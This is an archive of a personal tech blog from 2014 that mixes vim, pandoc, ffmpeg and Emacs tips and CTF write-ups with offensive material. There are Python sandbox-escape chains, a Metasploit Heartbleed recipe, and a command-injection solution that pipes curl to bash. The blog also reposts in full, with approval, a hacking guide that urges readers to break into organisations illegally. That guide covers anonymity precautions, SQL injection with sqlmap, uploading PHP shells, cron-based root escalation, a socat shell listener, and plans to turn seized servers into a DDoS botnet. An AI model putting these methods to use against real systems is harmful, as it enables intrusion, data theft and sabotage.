Thursday, December 11, 2014

Python jailbreak

This is a very common method to escape from a python jail.

The key idea is obtaining the <warnings.catch_warnings> class

# try to get <class 'warnings.catch_warnings'>
for i, j in enumerate({}.__class__.__base__.__subclasses__()):
    print(i, j)

# or another alternative way
print([c for c in {}.__class__.__base__.__subclasses__()  if c.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os'))

# The 59 here is warnings.catch_warnings
w = ().__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']('os')

w = [].__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']('os')

w = {}.__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']('os')

w = ().__class__.__base__.__subclasses__()[59].__init__.func_globals["linecache"].__dict__["os"]

w = [].__class__.__base__.__subclasses__()[59].__init__.func_globals["linecache"].__dict__["os"]

w = {}.__class__.__base__.__subclasses__()[59].__init__.func_globals["linecache"].__dict__["os"]

# all of the aboves are equivalent to
import os

Sunday, December 7, 2014


A lot of hacking is playing with other people, you know, getting them to do strange things. -- Steve Wozniak

Tuesday, November 25, 2014

金盾 2014 Game 9 - You know who.

At the first glance, I guessed the encryption might be some sorts of Caesar cipher, just used ipython to figure it out.

#!/usr/bin/env python3
jbnh ybce t owxh xtsix rod d hqoi edheoi swie rvz zee zfozr mb ihsirjbp zla zfhfso dx tsi, uph xrwf cw tgz mb lqf xkvbopsfvvk, vbo wlqfv pvg yrxtwez ovlw wts nhpzo qsf vroz utyiz hf mcs nkmxr. fgxs dki somx csc d puhkez ftgmzu yhjr zi vqr mxgjpw, atwta nitwip vvk nc hhpx hyto gsh aaicw isghv isrk vbjwlubx xggp; vs evv pvg loammj vvzwhh 'xwkmgs chh dwubiu srsp.'vkmk://zlrhm.oqnmshhfewkxn.bpw/wqgrfz.xaj
In [25]: [ord('oqnmshhfewkxn.bpw'[i]) - ord(''[i])  for i in range(len('oqnmshhfewkxn.bpw'))]
Out[25]: [14, -9, -7, -5, 14, -15, 3, 4, -14, 14, -9, 19, -5, 0, -12, 11, 3]
In [26]: [ord(c) for c in "voldemort"]
Out[26]: [118, 111, 108, 100, 101, 109, 111, 114, 116]
In [27]: [ord(c)-ord('a') for c in "voldemort"]
Out[27]: [21, 14, 11, 3, 4, 12, 14, 17, 19]
In [28]: [ord(c)-ord('a')-26 for c in "voldemort"]
Out[28]: [-5, -12, -15, -23, -22, -14, -12, -9, -7]
In [29]: [ord('vkmk'[i]) - ord('http'[i])  for i in range(len('http'))]
Out[29]: [14, -9, -7, -5]
In [30]: [26 + ord('oqnmshhfewkxn.bpw'[i]) - ord(''[i])  for i in range(len('oqnmshhfewkxn.bpw'))]
Out[30]: [40, 17, 19, 21, 40, 11, 29, 30, 12, 40, 17, 45, 21, 26, 14, 37, 29]
In [33]: [(26 + ord('oqnmshhfewkxn.bpw'[i]) - ord(''[i]))  for i in range(len('oqnmshhfewkxn.bpw'))]
Out[33]: [40, 17, 19, 21, 40, 11, 29, 30, 12, 40, 17, 45, 21, 26, 14, 37, 29]
In [34]: [(26 + ord('oqnmshhfewkxn.bpw'[i]) - ord(''[i]))%26  for i in range(len('oqnmshhfewkxn.bpw'))]
Out[34]: [14, 17, 19, 21, 14, 11, 3, 4, 12, 14, 17, 19, 21, 0, 14, 11, 3]
f = open('game9.txt', 'r')
idx = 0
perm = [21, 14, 11, 3, 4, 12, 14, 17, 19]
for line in f:
    for c in line:
        if ord('a') <= ord(c) <= ord('z'):
            print(chr((ord(c) - ord('a') + 52 - perm[idx]) % 26 + ord('a')), end='')
            idx += 1
            idx %= 9
            print(c, end='')
once upon a time there was a dear little girl who was loved by everyone who looked at her, but most of all by her grandmother, and there was nothing that she would not have given to the child. once she gave her a little riding hood of red velvet, which suited her so well that she would never wear anything else; so she was always called 'little red riding hood.'

After decoded the secret text, we got a picture and found some info in its exif info

ImageDescription    928iSfNYUQdaN6lM4nS080BI++VUy7n8wQZ+P89Z5O0kdWYmbuaN6VAq/Ulokd6a/QBll6fg0ml7WWTKcUK5ANW4wUPRZyZbdZWbTAHLkHFd3rvnUzP0SIswfV83PwW+
Make    nokia
Model   3310
XResolution 1
YResolution 1
ResolutionUnit  None
Artist  aes
YCbCrPositioning    Centered
Copyright   256bit

But we failed to find the decryption key for the AES-256 encryption.

After the game, our problem setter told us the AES key is just very simple little red riding hood without spaces.

Monday, November 3, 2014

Archlinux: Taiwan is NOT a Province of China anymore

An annoying bug in Archlinux for a long time is that the official guys always take the ISO standard for names of countries and regions which is totally wrong.

Taiwan is NOT a Province of China!

Recently, they changed it back to Taiwan. :)

Sunday, November 2, 2014

Converting Markdown to reStructuredText

I hate reStructuredText, it is not readable for me. But still, in some cases I have to hand on some stuffs in RST.

pandoc is a markup language converter written in Haskell (WTF?)/


pandoc -f markdown -t rst -o README.rst

pandoc --from=markdown --to=rst --output=README.rst

pandoc [OPTIONS] [FILES]
Input formats:  docbook, docx, epub, haddock, html, json, latex, markdown,
                markdown_github, markdown_mmd, markdown_phpextra,
                markdown_strict, mediawiki, native, opml, org, rst, t2t,
Output formats: asciidoc, beamer, context, docbook, docx, dokuwiki, dzslides,
                epub, epub3, fb2, haddock, html, html5, icml, json, latex, man,
                markdown, markdown_github, markdown_mmd, markdown_phpextra,
                markdown_strict, mediawiki, native, odt, opendocument, opml,
                org, pdf*, plain, revealjs, rst, rtf, s5, slideous, slidy,
                texinfo, textile
                [*for pdf output, use latex or beamer and -o FILENAME.pdf]

Tuesday, September 16, 2014

Sunday, September 14, 2014

Running vim without any configuration

Lots of people use a very huge config for vim. It makes me suck.

vim -u NONE

allows you to run an original version of vim, it's pretty useful especially temporarily working on other people's vim.

Monday, August 25, 2014

HITCON CTF 2014 experience

I have no idea why Google dropped almost all my pictures in this post. But I didn't keep original ones after I uploaded, sorry.

還在想要用英文還是中文寫這篇,不過考慮到一些來自台灣的朋友對於英文文章閱讀能力,最後還是決定用中文寫了,大意的部分翻成英文。順便防止國外隊伍偷學去 (誤)

I'm still wondering I should write this writeup in English or Chinese, some of my friends in Taiwan they can't (or don't want to) read English articles, so I decided to write this post in Chinese and try to translate (important parts) to English.

可以先看一下寬寬學長的 write up :(
Here's another write up from @Bletchley131

首先恭喜來自日本的 fuzzi3 (富士山),實在是非常強勁的隊伍,裡頭有好多個來自北海道、大阪和東京的 CTF 玩家,其中部分人來自打進 Defcon 22 final 裡面的 team "binja" (binary ninja 之意) 。雖然他們在 Defcon 沒有運氣像是 HITCON 這麼好,不過能有實力打進去 Defcon final 也代表是十分強大的對手。

Frist we congrats to fussi3 from Japan, a super powerful team. Lots of famous CTF players from Hokkaido, Osaka and Tokyo (北海道, 大阪 & 東京), some of them are members of the team "binja" in Defcon 22 final. Although they didn't have enough luck as team HITCON from Taiwan, but still an earthshaking competitor for us.

就不負責的 twitter 考據學,team fuzzi3 成員包括 @akiym (dodododo) ,team newbie (@mage_1868 + @hority), team katagaitai (@bata_24), team ε-δ Epsilon-Delta ( 再加上常來 hitcon 的勇士Q (@ucq) 和 @int03 ,他們根本是我所知道日本最強的一群人全都過來了!lol

According to some twitter feeds, the members of team fuzzi3 including @akiym (dodododo), team newbie (@mage_1868 + @hority), team katagaitai (@bata_24), team ε-δ Epsilon-Delta ( and vert often hitcon attendees 勇士Q (@ucq) & @int03 .

全部成員名單這邊有 (?)
Here's the total members list

我們隊伍 BambooFox (竹狐) 竹狐是,結合了兩個交大在 hitcon wargame 優勝常客 DSNS Lab 和 SQLab (CRAX) 以及一些朋友。

Our team "BambooFox" (竹狐) is the mascot of our school, we're a combination of two security labs, DSNS & SQLab (CRAX), both are very high ranking teams in previous HITCON games, plus some friends in NCTU (National Chiao Tung University).

原本我個人決定休息一年的 HITCON wargame 在 Shih-Kun Huang 老師的邀請下跟著 SQLab 和 DSNS lab 的高手們一起打,雖然是還是按照原本計畫是度假模式,僅只於嘴砲嘴砲的鍵盤參與,有在玩的時間也大概 24hr 不到,但是貢獻了最簡單的兩題後接著有開的題目又都不是自己熟悉的領域。比賽最後一刻才被隊友告知出了自己手頭產品相關的題目,無奈是花時間的計算題程式寫完後沒有足夠的時間把 key 算出來。不過後來也在 twitter 上面交了朋友。

Personally, I decided to take a rest of HITCON wargames, but after the invitation of Professor Shih-Kun Huang, I joined the game with SQLab guys. I was taking a vacation in Chicago on the weekend then, only chatted on trello boards and Skype, didn't help our team actually. :(
But on the final hours, my teammates told me there's a ELF is in HSA format (Brig file), I was astonished then. My works of my internship in states is solving the bugs in the HSA simulators! lol. But still, I didn't have enough time to complete that challenge (girby). Anyway, I made some friends on twitter after the game.

Here's the final ranking and solved challenges.

感謝隊長達達 ddaa 幫我們安排在學校電腦教室場地以及規劃相關的事宜,辛苦了!我們用 Skype 和 trello board 來分享紀錄比賽內容,似乎現在很多 CTF 比賽大家都用這兩個工具 XD 不過由於就算用了這些東西,資訊交換還是不太即時,也造成了部分多人同時寫程式的狀況。

Thanks to our team leader ddaa, for arranging the computer rooms in school and other stuffs.
We used Skype and trello board to exchange game information internally, just like other of CTF teams(?)


這題是 web 題,我一向不擅長 Web 類型的題目,即使在實戰經驗上確實打了不少網站 (面壁),這題題目是個 cgi ,給 ping/traceroute/curl 這幾個 command 可以用,測試了一下 ping -c 後發現可以部份的注入指令,當下想到的是一些常見的安裝方式,透過 curl + pipe 給 bash 或是其他程式跑

curl -L | perl - App::cpanminus

or curl -L url | bash

不過 | 好像不會動,在試了各樣的 quote 和 escape 後,發現 \ 剛好可以拿來用,成功注入指令,在 ls / cat 看完後發現 key file 在根目錄下,並且由另一個 user 權限掌控,所以 web server 無法讀取,不過有另一個 read_key 的 executable 可以用,拿來發現就噴出 key 惹!

This is a challenge about web cgis, although I had some real world experiences about website hacking, but still didn't do well in CTF web challenges. The problem is, giving a cgi script that can execute some common commands like ping/traceroute/curl. I tried ping -c and found we can some sort of command injection to the cgi script. I came up with the idea of some software installation, using curl and piping to bash then execute the downloaded content like cpanminus. The normal pipe (|) seemed useless in this case, after tring lots of fuzzying characters, quoting and escaping, "\|" was the correct one to execute a command after pipe. Tried ls / cat for directory listing, our key file is under the root directory, owned by another user "key", but very easy to use the read_key to read that out, done!

Special thanks to @Jokercatz

During the ctf game, I was enjoying my vacation, so I didn't have more pics /flee

Maze 是單純的苦工題,題目是一組 QR code 生成的迷宮,有點類似 nethack,我們使用了大量的工人智慧做暴力破解 orz
Maze is a human powered challange. The puzzle is made by a nethack style game of QR code maze, we used lots of human resource to "brute force" that orz.

日本駭客 @takesako 在 OSDC 2010 給過一場 "Polyglot Programming and Web Security" 很不錯的 talk ,那之後開始有點研究這種混雜語言程式設計。今年我自己沒有時間想題目 (都在玩) ,只能分享一些之前玩 polyglot 的經驗給隊友,結果效果拔群 成功幫助隊友解題!不過 Haskell 的部份我真的不熟就是 QQ
After the talk "Polyglot Programming and Web Security" given by @takesako in 2010, I've been a fan of polyglot programming, it's super cool!
In the challenge this year, I helped my teammates via sharing my experience about polyglot programming. It helped a lot! ^_^
But I didn't do well on the Haskell part Q_Q

最重要的核心思想就是使用 macro / 或是盡可能的讓 over lapping 的 code "互為註解" (見底下說明)

使用 C 的 macro #define 來替換東西,剛好 # 又會被 Perl/Python/Ruby 忽略當註解
使用 Python 的 doc string """ 包住非 python code
使用 C 的 /* */ 來包住其他語言
#*/ 這個可以當作最後的 pending 來結束非 C 的部分又不會被 Python/Ruby
Haskell 我不熟,不過應該可以用 {- ... -} 當作區塊註解
Haskell 似乎可以有 assignment 來省掉一些部分
C 裡面有個特殊技巧在 C90 和 1995 amendment to the C90 被引入 (trigraphs & digraphs),可以用來避開一些字元。

The core concept of polyglot programming is using macro or comments covering on overlapping codes for each other.
In C, #define macro can be used as substitutions, but also comments for Perl/Python/Ruby
In Python, we can use """ for multiline doc string to cover non-python codes.
In C using /* */ to cover other langs.
#*/ can be used as the ending of a polyglot program for a end of C-style comment and Perl/Python comments.
In Haskell, we can use {- ... -} for multiline comments or using assignment for some symbols.
trigraphs (already in C90) and digraphs (introduced in 1995 amendment to the C90) can be used to avoid some special characters.

Final codes:

griby 是包 Brigfile 的 ELF,brig 是 HSAIL 的 binary form. 然後我現在有在做一些跟 HSA simulator 相關的 bug fixing ... 禮拜天花了太多時間在玩,到了台灣清晨六點多我才被告之原來是 HSA 相關的題目,比賽時間不多雖然跟隊友分析完題目後我自幹了 HSA 的 host code 然後成功在隊友的 Linux box 上面跑起來,可惜這個算法是要花時間慢慢算的... 時間不夠殘念 GG

是說我出去度假前還跟強者同事 Jack 嘴砲說該不會我們現在弄 HSA 相關的東西因為可以改動到 host 上面的記憶體,所以會不會有機會出現相關的安全問題,例如看起來正常的 WebGL kernel 在畫 3D engine 其實背地裡在亂來之類的 XDDDD 結果題目就出來惹!!!!! T_T

girby is a ELF of Brig file format, which is the binary form of HSAIL. I'm now doing some bug fixing on the simulator ... orz
I spent too much time in the Museum of Science and Industry in Chicago, when it was 6 am in Taiwan, but I was having some fancy Italian food in RL Restaurant ( I wrote the host code for the HSA simulator to launch the kernel (girby), but it's a time consuming algorithm, so ... 残念でした.

I was talking with my colleague Jack about some security issues around HSA at night the day before I went to Chicago, since we can modify the contents in host memory (CPU side), maybe some bad guys will write a "looks good" WebGL kernel but doing some bad stuffs ... Ouch!!! The HSA-related problem was IN the HITCON game!!!

@winesap > darkx: It's not infinity i think, just very very slow :D

一些 HSA 相關的材料在這邊
Some other reference about HSA can be found here.

洋洋灑灑亂寫了,比賽打的很開心,隊友都很厲害,我自己個人貢獻沒有很多。不過明年應該看情況就真的會休息了吧!很感謝在 twitter 上面又交了不少新的朋友,其他隊伍也很強,安全對我來說始終算是個當作業餘興趣在打的東西吧,特別是某事件之後 :P 還是專心寫 compilers 吧。

I just finished a mess of this post, anyway, I enjoyed the game, our teammates are powerful, comparing to my personal contribution... I think maybe I'll really take a rest next year? Thanks to the new friends from team fuzzi3 on Twitter, other teams are nice, too. Well, network security for me is just a game, I should not put too much on it. Focus on more studies about compiler techniques :p

Friday, August 15, 2014

Vim split window scrollbind

Sometimes, you want to make vim to scroll down two windows together (like in vimdiff).

:set scb
:set scrollbind

# toggle the option
:set scb!


Thursday, August 14, 2014

[Backup] A DIY Guide for those without the patience to wait for whistleblowers

This is a backup of a really nice hacking tutorial. You can find the original link on pastebin

Thanks to all gifted hackers inspiring me. :D

Happy hacking.

- x4r


                _   _            _      ____             _    _ 
               | | | | __ _  ___| | __ | __ )  __ _  ___| | _| |
               | |_| |/ _` |/ __| |/ / |  _ \ / _` |/ __| |/ / |
               |  _  | (_| | (__|   <  | |_) | (_| | (__|   <|_|
               |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
     A DIY Guide for those without the patience to wait for whistleblowers

--[ 1 ]-- Introduction

I'm not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz
it took to 0wn Gamma. I'm writing this to demystify hacking, to show how simple
it is, and to hopefully inform and inspire you to go out and hack shit. If you
have no experience with programming or hacking, some of the text below might
look like a foreign language. Check the resources section at the end to help you
get started. And trust me, once you've learned the basics you'll realize this
really is easier than filing a FOIA request.

--[ 2 ]-- Staying Safe

This is illegal, so you'll need to take same basic precautions:

1) Make a hidden encrypted volume with Truecrypt 7.1a [0]
2) Inside the encrypted volume install Whonix [1]
3) (Optional) While just having everything go over Tor thanks to Whonix is
   probably sufficient, it's better to not use an internet connection connected
   to your name or address. A cantenna, aircrack, and reaver can come in handy


As long as you follow common sense like never do anything hacking related
outside of Whonix, never do any of your normal computer usage inside Whonix,
never mention any information about your real life when talking with other
hackers, and never brag about your illegal hacking exploits to friends in real
life, then you can pretty much do whatever you want with no fear of being v&.

NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable
for some things like web browsing, when it comes to using hacking tools like
nmap, sqlmap, and nikto that are making thousands of requests, they will run
very slowly over Tor. Not to mention that you'll want a public IP address to
receive connect back shells. I recommend using servers you've hacked or a VPS
paid with bitcoin to hack from. That way only the low bandwidth text interface
between you and the server is over Tor. All the commands you're running will
have a nice fast connection to your target.

--[ 3 ]-- Mapping out the target

Basically I just repeatedly use fierce [0], whois lookups on IP addresses and
domain names, and reverse whois lookups to find all IP address space and domain
names associated with an organization.


For an example let's take Blackwater. We start out knowing their homepage is at Running -dns we find the subdomains:

Now we do whois lookups and find the homepage of is hosted on
Amazon Web Service, while the other IPs are in the range:
NetRange: -
CustName:       Blackwater USA
Address:        850 Puddin Ridge Rd

Doing a whois lookup on reveals it's also registered to the same
address, so we'll use that as a string to search with for the reverse whois
lookups. As far as I know all the actual reverse whois lookup services cost
money, so I just cheat with google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup
"850 Puddin Ridge Rd" inurl:domaintools

Now run -range on the IP ranges you find to lookup dns names, and -dns on the domain names to find subdomains and IP addresses. Do more
whois lookups and repeat the process until you've found everything.

Also just google the organization and browse around its websites. For example on we find links to a careers portal, an online store, and an employee
resources page, so now we have some more:

If you repeat the whois lookups and such you'll find seems to
not be hosted or maintained by Blackwater, so scratch that off the list of
interesting IPs/domains.

In the case of FinFisher what led me to the vulnerable
was simply a whois lookup of which found it registered to the name
"FinFisher GmbH". Googling for:
"FinFisher GmbH" inurl:domaintools
finds, which redirects to now you've got some idea how I map out a target.
This is actually one of the most important parts, as the larger the attack
surface that you are able to map out, the easier it will be to find a hole
somewhere in it.

--[ 4 ]-- Scanning & Exploiting

Scan all the IP ranges you found with nmap to find all services running. Aside
from a standard port scan, scanning for SNMP is underrated.

Now for each service you find running:

1) Is it exposing something it shouldn't? Sometimes companies will have services
running that require no authentication and just assume it's safe because the url
or IP to access it isn't public. Maybe fierce found a git subdomain and you can
go to git.companyname.come/gitweb/ and browse their source code.

2) Is it horribly misconfigured? Maybe they have an ftp server that allows
anonymous read or write access to an important directory. Maybe they have a
database server with a blank admin password (lol stratfor). Maybe their embedded
devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer's
default password.

3) Is it running an old version of software vulnerable to a public exploit?

Webservers deserve their own category. For any webservers, including ones nmap
will often find running on nonstandard ports, I usually:

1) Browse them. Especially on subdomains that fierce finds which aren't intended
for public viewing like or you'll often find
interesting stuff just by looking at them.

2) Run nikto [0]. This will check for things like webserver/.svn/,
webserver/backup/, webserver/phpinfo.php, and a few thousand other common
mistakes and misconfigurations.

3) Identify what software is being used on the website. WhatWeb is useful [1]

4) Depending on what software the website is running, use more specific tools
like wpscan [2], CMS-Explorer [3], and Joomscan [4].

First try that against all services to see if any have a misconfiguration,
publicly known vulnerability, or other easy way in. If not, it's time to move
on to finding a new vulnerability:

5) Custom coded web apps are more fertile ground for bugs than large widely used
projects, so try those first. I use ZAP [5], and some combination of its
automated tests along with manually poking around with the help of its
intercepting proxy.

6) For the non-custom software they're running, get a copy to look at.  If it's
free software you can just download it. If it's proprietary you can usually
pirate it. If it's proprietary and obscure enough that you can't pirate it you
can buy it (lame) or find other sites running the same software using google,
find one that's easier to hack, and get a copy from them.


For the process was:

* Start nikto running in the background.

* Visit the website. See nothing but a login page. Quickly check for sqli in the
  login form.

* See if WhatWeb knows anything about what software the site is running.

* WhatWeb doesn't recognize it, so the next question I want answered is if this
  is a custom website by Gamma, or if there are other websites using the same

* I view the page source to find a URL I can search on (index.php isn't
  exactly unique to this software). I pick Scripts/scripts.js.php, and google:

* I find there's a handful of other sites using the same software, all coded by
  the same small webdesign firm. It looks like each site is custom coded but
  they share a lot of code. So I hack a couple of them to get a collection of
  code written by the webdesign firm.

At this point I can see the news stories that journalists will write to drum
up views: "In a sophisticated, multi-step attack, hackers first compromised a
web design firm in order to acquire confidential data that would aid them in
attacking Gamma Group..."

But it's really quite easy, done almost on autopilot once you get the hang of
it. It took all of a couple minutes to:

* google allinurl:"Scripts/scripts.js.php" and find the other sites

* Notice they're all sql injectable in the first url parameter I try.

* Realize they're running Apache ModSecurity so I need to use sqlmap [0] with
  the option --tamper='tamper/'

* Acquire the admin login information, login and upload a php shell [1] (the
  check for allowable file extensions was done client side in javascript), and
  download the website's source code.


Looking through the source code they might as well have named it Damn Vulnerable
Web App v2 [0]. It's got sqli, LFI, file upload checks done client side in
javascript, and if you're unauthenticated the admin page just sends you back to
the login page with a Location header, but you can have your intercepting proxy
filter the Location header out and access it just fine.


Heading back over to the finsupport site, the admin /BackOffice/ page returns
403 Forbidden, and I'm having some issues with the LFI, so I switch to using the
sqli (it's nice to have a dozen options to choose from). The other sites by the
web designer all had an injectable print.php, so some quick requests to: and 1=1 and 2=1
reveal that finsupport also has print.php and it is injectable. And it's
database admin! For MySQL this means you can read and write files. It turns out
the site has magicquotes enabled, so I can't use INTO OUTFILE to write files.
But I can use a short script that uses sqlmap --file-read to get the php source
for a URL, and a normal web request to get the HTML, and then finds files
included or required in the php source, and finds php files linked in the HTML,
to recursively download the source to the whole site.

Looking through the source, I see customers can attach a file to their support
tickets, and there's no check on the file extension. So I pick a username and
password out of the customer database, create a support request with a php shell
attached, and I'm in!

--[ 5 ]-- (fail at) Escalating

< got r00t? >
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

Root over 50% of linux servers you encounter in the wild with two easy scripts,
Linux_Exploit_Suggester [0], and unix-privesc-check [1].


finsupport was running the latest version of Debian with no local root exploits,
but unix-privesc-check returned:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user
www-data can write to /etc/cron.hourly/mgmtlicensestatus
WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data
can write to /etc/cron.hourly/webalizer

so I add to /etc/cron.hourly/webalizer:
chown root:root /path/to/my_setuid_shell
chmod 04755 /path/to/my_setuid_shell

wait an hour, and ....nothing. Turns out that while the cron process is running
it doesn't seem to be actually running cron jobs. Looking in the webalizer
directory shows it didn't update stats the previous month. Apparently after
updating the timezone cron will sometimes run at the wrong time or sometimes not
run at all and you need to restart cron after changing the timezone. ls -l
/etc/localtime shows the timezone got updated June 6, the same time webalizer
stopped recording stats, so that's probably the issue. At any rate, the only
thing this server does is host the website, so I already have access to
everything interesting on it. Root wouldn't get much of anything new, so I move
on to the rest of the network.

--[ 6 ]-- Pivoting

The next step is to look around the local network of the box you hacked.  This
is pretty much the same as the first Scanning & Exploiting step, except that
from behind the firewall many more interesting services will be exposed. A
tarball containing a statically linked copy of nmap and all its scripts that you
can upload and run on any box is very useful for this. The various nfs-* and
especially smb-* scripts nmap has will be extremely useful.

The only interesting thing I could get on finsupport's local network was another
webserver serving up a folder called 'qateam' containing their mobile malware.

--[ 7 ]-- Have Fun

Once you're in their networks, the real fun starts. Just use your imagination.
While I titled this a guide for wannabe whistleblowers, there's no reason to
limit yourself to leaking documents. My original plan was to:
1) Hack Gamma and obtain a copy of the FinSpy server software
2) Find vulnerabilities in FinSpy server.
3) Scan the internet for, and hack, all FinSpy C&C servers.
4) Identify the groups running them.
5) Use the C&C server to upload and run a program on all targets telling them
   who was spying on them.
6) Use the C&C server to uninstall FinFisher on all targets.
7) Join the former C&C servers into a botnet to DDoS Gamma Group.

It was only after failing to fully hack Gamma and ending up with some
interesting documents but no copy of the FinSpy server software that I had to
make due with the far less lulzy backup plan of leaking their stuff while
mocking them on twitter.
Point your GPUs at and crack the password
already so I can move on to step 2!

--[ 8 ]-- Other Methods

The general method I outlined above of scan, find vulnerabilities, and exploit
is just one way to hack, probably better suited to those with a background in
programming. There's no one right way, and any method that works is as good as
any other. The other main ways that I'll state without going into detail are:

1) Exploits in web browers, java, flash, or microsoft office, combined with
emailing employees with a convincing message to get them to open the link or
attachment, or hacking a web site frequented by the employees and adding the
browser/java/flash exploit to that.
This is the method used by most of the government hacking groups, but you don't
need to be a government with millions to spend on 0day research or subscriptions
to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit
for a couple thousand, and rent access to one for much less. There's also
metasploit browser autopwn, but you'll probably have better luck with no
exploits and a fake flash updater prompt.

2) Taking advantage of the fact that people are nice, trusting, and helpful 95%
of the time.
The infosec industry invented a term to make this sound like some sort of
science: "Social Engineering". This is probably the way to go if you don't know
too much about computers, and it really is all it takes to be a successful
hacker [0].


--[ 9 ]-- Resources


  (all his other blog posts are great too)
* (start at Exploit writing tutorial part 1)
  One trick it leaves out is that on most systems the apache access log is
  readable only by root, but you can still include from /proc/self/fd/10 or
  whatever fd apache opened it as. It would also be more useful if it mentioned
  what versions of php the various tricks were fixed in.
  Get usable reverse shells with a statically linked copy of socat to drop on
  your target and:
  target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM
  host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM
  It's also useful for setting up weird pivots and all kinds of other stuff.


* The Web Application Hacker's Handbook
* Hacking: The Art of Exploitation
* The Database Hacker's Handbook
* The Art of Software Security Assessment
* A Bug Hunter's Diary
* Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
* TCP/IP Illustrated

Aside from the hacking specific stuff almost anything useful to a system
administrator for setting up and administering networks will also be useful for
exploring them. This includes familiarity with the windows command prompt and unix
shell, basic scripting skills, knowledge of ldap, kerberos, active directory,
networking, etc.

--[ 10 ]-- Outro

You'll notice some of this sounds exactly like what Gamma is doing. Hacking is a
tool. It's not selling hacking tools that makes Gamma evil. It's who their
customers are targeting and with what purpose that makes them evil. That's not
to say that tools are inherently neutral. Hacking is an offensive tool. In the
same way that guerrilla warfare makes it harder to occupy a country, whenever
it's cheaper to attack than to defend it's harder to maintain illegitimate
authority and inequality. So I wrote this to try to make hacking easier and more
accessible. And I wanted to show that the Gamma Group hack really was nothing
fancy, just standard sqli, and that you do have the ability to go out and take
similar action.

Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea
Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned
hackers, dissidents, and criminals!

Saturday, July 19, 2014

cutting videos with ffmpeg

ffmpeg -i input.mp3 -ss HH:MM:SS -t HH:MM:SS -async 1 output.mp3

ffmpeg -i yoga4A.mp3 -ss 00:05:50 -t 00:23:50 -async 1 yoga4A-2.mp3

Wednesday, June 4, 2014

share binary file via gist using uuencode

@CindyLinz shared me some interesting file via gist paste.

pacman -S sharutils

uuencode input output
# paste the output file to a new gist

# download the raw file
uudecode file

Tuesday, May 27, 2014

cisco command notes

ssh user@sw
en             # enable
conf t         # configure terminal
ip http server

sh ru          # show running-config
sh start       # show startup-config


some cheat sheets

Friday, May 16, 2014

Install better Emacs on Mac OS X

Of course, with Homebrew

brew fetch emacs --HEAD --force

brew reinstall emacs --use-git-head --srgb --japanese --with-gnutls --with-cocoa --with-x11 --HEAD --force

brew linkapps emacs

Friday, May 9, 2014

listen to ICRT under linux via mplayer

Listening to ICRT news is a good way to learn English.

append in my ~/.bashrc

# listen to the ICRT radio
icrt () {
    mplayer mms://

Tuesday, May 6, 2014

A brief note for ssl-heartbleed exploit on Kali


# <rip> for remote IP (target)

# nmap -sV --script=ssl-heartbleed <rip>
# service postgresql start
# service metasploit start
# msfconsole
msf> use auxiliary/scanner/ssl/openssl_heartbleed
msf> show options
msf> set RHOSTS <rip>
msf> set verbose true
msf>  exploit

Monday, May 5, 2014

Move .emacs.d to bbatsov/prelude

After a night of Sashimi, I went my friend @superbil's home.

We talked a lot about emacs and other interesting hacking stuffs.

He recommend me to switch my emacs configuration to Bozhidar Batsov's prelude on github.


Backup all stuffs in my .emacs and .emacs.d/ directory.


git clone .emacs.d

Copy prelude-modules.el from sample/ to personal/ .

cp sample/prelude-modules.el personal/

Comment (out) modules I need

Launch my emacs.

(waiting for compiling lisp files)

Make prelude up to date

M-x prelude-update

Restart my emacs.



Other settings

Add @superbil's fix-font-org-mode.el under personal/preload/

Switch to color-theme-sanityinc-tomorrow


github-browse-file mode
switch-window mode
guide-key mode
ace-jump mode
rebind C-h

Big thanks to @superbil (

Friday, April 4, 2014

attach tmux after update

I do pacman -Syu to upgrade my system. After that, I can't attach my tmux session.

$ tmux attach
protocol version mismatch (client 8, server 7)

Here's a hack to attach my session.

$ pgrep tmux
$ /proc/23335/exe attach

Well done!


Monday, March 10, 2014

Extract subtitles from mkv movies

$ sudo pacman -S mkvtoolnix-cli

$ mkvmerge -i 5426d90fb609da53e52fdc31ce1180efb6e29430
File '5426d90fb609da53e52fdc31ce1180efb6e29430': container: Matroska
Track ID 0: audio (PCM)
Track ID 1: video (MPEG-4p10/AVC/h.264)
Track ID 2: subtitles (SubRip/SRT)
Global tags: 1 entries

$ mkvextract tracks 5426d90fb609da53e52fdc31ce1180efb6e29430
Extracting track 2 with the CodecID 'S_TEXT/UTF8' to the file ''. Container format: SRT text subtitles
Progress: 100%


Friday, March 7, 2014

Setup a remote ipyhton notebook

# setup a password for the notebook
$ ipython
In [1]: from IPython.lib import passwd
In [2]: passwd()
Enter password:
Verify password:
Out[2]: 'sha1:747ba2295030:7bbe79e452b9bb3cae6e66ed738563e18a15462c'

# self-signed cert
$ openssl req -x509 -nodes -days 365 -newkey rsa:1024 -keyout mycert.pem -out mycert

# edit the profile for notebook
$ mkdir ~/.config/ipython/profile_serv/
$ vim ~/.config/ipython/profile_serv/

c = get_config()
c.NotebookApp.password = u'sha1:747ba2295030:7bbe79e452b9bb3cae6e66ed738563e18a15462c'
c.NotebookApp.ip = '*'
c.NotebookApp.open_browser = False
c.NotebookApp.port = 10001
c.NotebookApp.certfile = u'/home/xatier/note/mycert.pem'

# run it!
$ ipython notebook --profile=serv


Wednesday, January 1, 2014

bye, 2013


點和點之間的 connection 不斷的新生又斷開

人在美國時也常打 Skype 回來

感謝 ijsung 學長和 Dr. Hwu 的推薦
同事們都很棒,也感謝大老闆 AGK 、娘娘、公主們的照顧
Mark, Matthieu, Karoline, Kevin, Tom, Alex 你們都很好好 QQ
回程前去 Chicago, 真的是很棒的城市

年初和 jserv 學長在一中舉辦了系統程式的寒訓
